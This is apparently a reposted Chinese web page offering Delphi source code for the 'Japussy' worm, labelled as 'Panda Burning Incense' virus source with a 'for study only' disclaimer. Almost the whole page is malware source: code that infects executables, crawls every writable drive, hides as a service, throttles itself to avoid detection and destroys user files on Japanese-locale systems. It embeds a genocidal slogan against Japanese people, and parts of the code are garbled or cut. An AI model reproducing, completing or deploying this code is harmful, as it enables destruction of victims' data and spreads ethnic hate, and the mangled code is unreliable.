
www swlp info(INFO系统)

时间:2024-10-18 22:33:23 来源:生龙活虎网 作者:每日趣闻 阅读:727次
山寨版熊猫烧香是什么啊?熊猫烧香病毒源代码 --------------------------------------------------------------------------------仅供学习\研究使用,否则后果自负.本站不负任何责任! 代码:--------------------------------------------------------------------------------程序代码program Japussy;uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe} IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = "If a race need to be killed out, it must be Yamato. " + "If a country need to be destroyed, it must be Japan! " + "*** W32.Japussy.Worm.A ***";function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external "Kernel32.dll"; //函数声明var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;var Ver: TOSVersionInfo;begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True;end;{ 在流之间复制 }procere CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);var sCurPos, dCurPos: Integer;begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0);end;{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }procere ExtractFile(FileName: string);var sStream, dStream: TFileStream;begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally 
sStream.Free; end; except end;end;{ 填充STARTUPINFO结构 }procere FillStartupInfo(var Si: STARTUPINFO; State: Word);begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil;end;{ 发带毒邮件 }procere SendMail;begin //哪位仁兄愿意完成之?end;{ 感染PE文件 }procere InfectOneFile(FileName: string);var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char;begin try //出错则文件正在被使用,退出 if CompareText(FileName, "JAPUSSY.EXE") = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查PE文件头 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); //检查感染标记 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size 16) and (SearchRec.Name ".") and (SearchRec.Name "..") then Result := 0 //不是目录 else if (SearchRec.Attr = 16) and (SearchRec.Name ".") and (SearchRec.Name "..") then Result := 1 //不是根目录 else Result := 2; //是根目录 end;begin if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then begin repeat PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + SearchRec.Name; Ext := UpperCase(ExtractFileExt(Fn)); if (Ext = ".EXE") or (Ext = ".SCR") then begin InfectOneFile(Fn); //感染可执行文件 end else if (Ext = ".HTM") or (Ext = ".HTML") or (Ext = ".ASP") then begin //感染HTML和ASP文件,将Base64编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? 
end else if Ext = ".WAB" then //Outlook地址簿文件 begin //获取Outlook邮件地址 end else if Ext = ".ADC" then //Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end else if Ext = "IND" then //Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin if IsJap then //是倭文操作系统 begin if (Ext = ".DOC") or (Ext = ".XLS") or (Ext = ".MDB") or (Ext = ".MP3") or (Ext = ".RM") or (Ext = ".RA") or (Ext = ".WMA") or (Ext = ".ZIP") or (Ext = ".RAR") or (Ext = ".MPEG") or (Ext = ".ASF") or (Ext = ".JPG") or (Ext = ".JPEG") or (Ext = ".GIF") or (Ext = ".SWF") or (Ext = ".PDF") or (Ext = ".CHM") or (Ext = ".AVI") then SmashFile(Fn); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 Sleep(200); until (FindNext(SearchRec) 0); end; FindClose(SearchRec); SubDir := TStringList.Create; if (FindFirst(Path + "*.*", faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then SubDir.Add(SearchRec.Name); until (FindNext(SearchRec) 0); end; FindClose(SearchRec); Count := SubDir.Count - 1; for i := 0 to Count do LoopFiles(Path + SubDir.Strings[i] + "", Mask); FreeAndNil(SubDir);end;{ 遍历磁盘上所有的文件 }procere InfectFiles;var DriverList: string; i, Len: Integer;begin if GetACP = 932 then //日文操作系统 IsJap := True; //去死吧! DriverList := GetDrives; //得到可写的磁盘列表 Len := Length(DriverList); while True do //死循环 begin for i := Len downto 1 do //遍历每个磁盘驱动器 LoopFiles(DriverList[i] + ":", "*.*"); //感染之 SendMail; //发带毒邮件 Sleep(1000 * 60 * 5); //睡眠5分钟 end;end;{ 主程序开始 }begin if IsWin9x then //是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 else //WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? 
end; //如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr(0)), "Japussy.exe") = 0 then InfectFiles //感染和发邮件 else //已寄生于宿主程序上了,开始工作 begin TmpFile := ParamStr(0); //创建临时文件 Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + ".exe"; //真正的宿主文件,多一个空格 ExtractFile(TmpFile); //分离之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, ".", Si, Pi); //创建新进程运行之 InfectFiles; //感染和发邮件 end;end.文章来源:Yourof编程社区 http://www.Yourof.com

